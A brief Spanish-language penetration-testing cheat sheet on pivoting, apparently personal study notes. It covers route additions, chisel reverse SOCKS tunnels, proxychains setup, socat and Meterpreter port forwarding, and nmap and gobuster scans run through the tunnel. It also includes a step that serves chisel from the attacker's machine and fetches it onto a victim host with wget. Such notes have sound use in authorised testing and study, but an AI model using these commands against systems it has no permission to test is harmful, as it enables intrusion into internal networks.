🦘Pivoting

canguro

IP Routing:

ip route add <IP/range> via <gateway>
route # comprobar nuevas rutas

IP Routing - Metasploit

ip addr / ifconfig # check nuevas IPs
ping -c 1 <nuevaIP> # check acceso
route add <nuevaIP> # Añade route
route print # comprueba

Port Forwarding:

Port Forwarding con CHISEL

Transferencia a víctima:

python3 -m http.server 80
# /tmp
wget http://<IPa>/chisel
-------------------------------
scp chisel root@<IPv>:/tmp/chisel

Tunneling:

# Set Atacante como server:
./chisel server --reverse -p 1234

# Comprobar disponibilidad de nuestros puertos:
lsof -i:<port>

# Set Víctima como cliente:
./chisel client <IPa>:1234  R:socks

# Editar proxychains
nano /etc/proxychains.conf
> # comentar dinamic chain
> descomentar strict chain

# Añadir en última línea
socks5 127.0.0.1 1080

Port Forwarding - SOCAT

./socat TCP-LISTEN:<port>,fork TCP:<IPa>:<port>

Port Forwarding - METERPRETER

meterpreter: portfwd add -l <localPort> -p <port> -r <IPv>
portfwd list
nmap -sCV -p <localPort> localhost

--------------------------------------------------------------------------------------

Nmap scan + hilos xargs por tunnel:

seq 1 65535 | xargs -P 500 -I {} proxychains nmap -sT -Pn -p{} -open -T5 -v -n <IP> 2>&1 | grep "tcp open"

Config FoxyProxy para tunnel browser:

Proxy type > SOCKS5
Proxy IP > 127.0.0.1
Port > 1080

Enumerar directorios web por tunnel:

gobuster dir -u http://<IP> -w <wordlist_path> -t 20 -x html,php,txt --proxy socks5://127.0.0.1:1080

Última actualización